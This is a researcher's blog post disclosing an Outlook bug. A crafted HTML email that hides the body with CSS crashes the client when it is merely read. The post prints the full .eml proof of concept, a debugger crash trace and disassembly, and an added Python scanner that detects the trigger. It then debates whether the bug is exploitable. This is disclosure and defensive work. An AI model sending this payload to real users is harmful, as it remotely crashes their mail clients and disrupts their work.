Monday, March 27, 2017

An Interesting Outlook Bug

Last week I reported an interesting bug in Outlook to Microsoft: it's an HTML email, and when you send this email to someone, Outlook will crash when he/she *just reads* the email (a similar danger level to my #BadWinmail bug, if this one is exploitable). As MSRC told me today that they think it's a non-exploitable bug and it seems that they are not going to fix it in the near future, I'm releasing the details in this quick write-up, hopefully for an "old pedant" style open discussion about the exploitability, as I still have some doubts. :-)

The PoC could be as simple as the following, or you may download the .eml file here.

Content-Type: multipart/alternative; boundary="===============111111111111=="
MIME-Version: 1.0
Subject: title
From: aa@msft.com
To: bb@msft.com

--===============111111111111==
Content-Type: text/plain; charset="us-ascii"
MIME-Version: 1.0
Content-Transfer-Encoding: 7bit

plain text area
--===============111111111111==
Content-Type: text/html; charset="us-ascii"
MIME-Version: 1.0

<html>
<head>
<style>body{display:none !important;}</style>
</head>
<body>    
<div>
e
</div>
<div>
<table>
<tr height="1%">
</tr>
</table>
</div>
<div>
e
</div>
</body>
</html>

--===============111111111111==--


If you run some tests based on the PoC, you will quickly figure out that the CSS rule "<style>body{display:none !important;}</style>" is the important piece here. For example, if we remove this line, Outlook won't crash. This also suggests that the bug is related to some "CSS rendering" code in Outlook.
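The observation above (the hidden-body CSS rule is what makes the PoC effective) can be turned into a mail-gateway or triage check. The following is an added Python example, not code from the original post: it parses a message with the standard library `email` package, walks the text/html parts, and flags any whose `<style>` block sets `display:none` on `body`, additionally noting the percentage-height `<tr>` that accompanies it in the PoC. The two sample messages are constructed here (the first reproduces the PoC from this post, with the closing quote of the boundary parameter supplied); the function and pattern names are my own.

```python
"""Added example (not from the original post): flag HTML mail parts that carry
the CSS trigger pattern described in the write-up, using only the stdlib."""
import re
from email import policy
from email.parser import BytesParser

# Constructed sample: the PoC message from the write-up, reproduced with the
# boundary parameter's closing quote so the stdlib parser handles it reliably.
POC_EML = b"""Content-Type: multipart/alternative; boundary="===============111111111111=="
MIME-Version: 1.0
Subject: title
From: aa@msft.com
To: bb@msft.com

--===============111111111111==
Content-Type: text/plain; charset="us-ascii"
MIME-Version: 1.0
Content-Transfer-Encoding: 7bit

plain text area
--===============111111111111==
Content-Type: text/html; charset="us-ascii"
MIME-Version: 1.0

<html><head><style>body{display:none !important;}</style></head>
<body><div>e</div><div><table><tr height="1%"></tr></table></div><div>e</div></body></html>

--===============111111111111==--
"""

# Constructed benign message for comparison: styled HTML, but the body stays visible.
BENIGN_EML = b"""Content-Type: text/html; charset="us-ascii"
MIME-Version: 1.0
Subject: hello
From: aa@msft.com
To: bb@msft.com

<html><head><style>p{color:red;}</style></head><body><p>hi</p></body></html>
"""

# Contents of every <style> element in the HTML.
STYLE_RE = re.compile(r"<style[^>]*>(.*?)</style>", re.I | re.S)
# A CSS rule for "body" whose declarations set display:none (with or without
# !important). The write-up identifies this rule as necessary for the crash.
HIDDEN_BODY_RE = re.compile(r"\bbody\s*\{[^}]*display\s*:\s*none", re.I | re.S)
# The percentage-height table row that sits next to the hidden body in the PoC.
PCT_ROW_RE = re.compile(r"<tr\b[^>]*\bheight\s*=\s*['\"]?\d+%", re.I)


def scan_eml(raw: bytes) -> list:
    """Return one finding string per suspicious feature found in text/html parts.

    An empty list means no HTML part hides <body> via CSS.
    """
    msg = BytesParser(policy=policy.default).parsebytes(raw)
    findings = []
    # walk() yields the container first, then each leaf part in order.
    for idx, part in enumerate(msg.walk()):
        if part.get_content_type() != "text/html":
            continue
        html = part.get_content()           # decoded str under policy.default
        css = " ".join(STYLE_RE.findall(html))
        if HIDDEN_BODY_RE.search(css):
            findings.append(f"part {idx}: <style> hides <body> (display:none)")
            if PCT_ROW_RE.search(html):
                findings.append(f"part {idx}: percentage-height <tr> alongside hidden body")
    return findings


if __name__ == "__main__":
    for name, sample in (("poc", POC_EML), ("benign", BENIGN_EML)):
        print(name, scan_eml(sample) or "clean")
```

The check looks at the CSS inside `<style>` rather than at the raw bytes, so an attribute such as `style="display:none"` on an unrelated element does not trigger it; a visible body with a hidden `<div>` is ordinary newsletter markup, whereas a `body{display:none}` rule has no legitimate use in mail and is exactly the line whose removal stops the crash.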


The Crash

The following crash should be observed on Office 2010 14.0.7177.5000, fully updated as of March 21, 2017. In fact, I believe it affects all Outlook versions.

(384.400): Access violation - code c0000005 (!!! second chance !!!)
eax=0020f580 ebx=0ea72288 ecx=00000000 edx=00000000 esi=191cdfd0 edi=5d064400
eip=5c5e17e5 esp=0020f56c ebp=0020f754 iopl=0 nv up ei pl nz na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010202
wwlib!DllGetLCID+0x25b35f:
5c5e17e5 f781e402000000040000 test dword ptr [ecx+2E4h],400h ds:0023:000002e4=????????
0:000> k
ChildEBP RetAddr
WARNING: Stack unwind information not available. Following frames may be wrong.
0020f754 5c5a2b93 wwlib!DllGetLCID+0x25b35f
0020f774 5c1d80de wwlib!DllGetLCID+0x21c70d
0020f794 5c1d801b wwlib!GetAllocCounters+0x51906
0020f818 5c1d5c33 wwlib!GetAllocCounters+0x51843
0020f82c 5c26d803 wwlib!GetAllocCounters+0x4f45b
0020f83c 2f63f1b6 wwlib!GetAllocCounters+0xe702b
0020f880 2f63f06b outlook!GetMsoInst+0x32e2
0020f8a8 2ffb9d6b outlook!GetMsoInst+0x3197
0020f938 76b0ef1c outlook!PushSavedKeyToCicero+0x291d8
0020f944 7733367a kernel32!BaseThreadInitThunk+0xe
0020f984 7733364d ntdll!__RtlUserThreadStart+0x70
0020f99c 00000000 ntdll!_RtlUserThreadStart+0x1b

It crashes at the following address:

.text:31B417D2 loc_31B417D2: ; CODE XREF: sub_31714D18+42CB1Ej
.text:31B417D2 lea eax, [ebp+var_1DC]
.text:31B417D8 push eax
.text:31B417D9 push [ebp+var_4]
.text:31B417DC push ebx
.text:31B417DD call sub_3177CE19                          ;memory data at eax will be updated
.text:31B417E2 mov ecx, [eax+48h]                           ;read the pointer at offset 0x48
.text:31B417E5 test dword ptr [ecx+2E4h], 400h      ;crash


Since the data pointed to by EAX (@31B417E2) is updated in function "sub_3177CE19", I did some debugging in that function, and it seems that:
  1. There seems to be a custom heap allocator, as I've seen heap block headers and links.
  2. "sub_3177CE19" does the job of locating the data based on the 1st param (a pointer) and the 2nd param (always 0), and the data is copied to the heap block pointed to by the 3rd param.
  3. According to my tests, the copied bytes are always 0x00, so that's why it looks like a NULL pointer dereference bug.


Discussions

If security were that clear, there would be no security research. :-) Due to the complexity of the Office code and Microsoft's continued refusal to release Office symbols (I've said this a million times), it's really hard to be 100% sure from the outside.

The first point I'd make is that it's really hard to debug the data flow without symbols; if you look at the related code you will find that this isn't that firmly a NULL pointer. Instead, the 0x00 bytes are copied from another pointer, and that is related to some internal structures. The second is that when I tested it in a live environment (email server + Outlook), I observed some different things. If I remember correctly, it was an Outlook 2016 (32-bit) + Windows 10 (64-bit) environment: when I receive/read such an email, Outlook sometimes won't crash immediately; instead, it crashes at a different address when the user performs further actions in Outlook. I don't remember the details of the "live test", but it does increase my doubts.

To say the least, crashing someone's Outlook *remotely* is still a bad thing, right? Think about it: someone is working in Outlook, and Outlook crashes when he/she reads the incoming email.

Feel free to reach me with your thoughts. :-)

Thanks,
Haifei
73 comments:
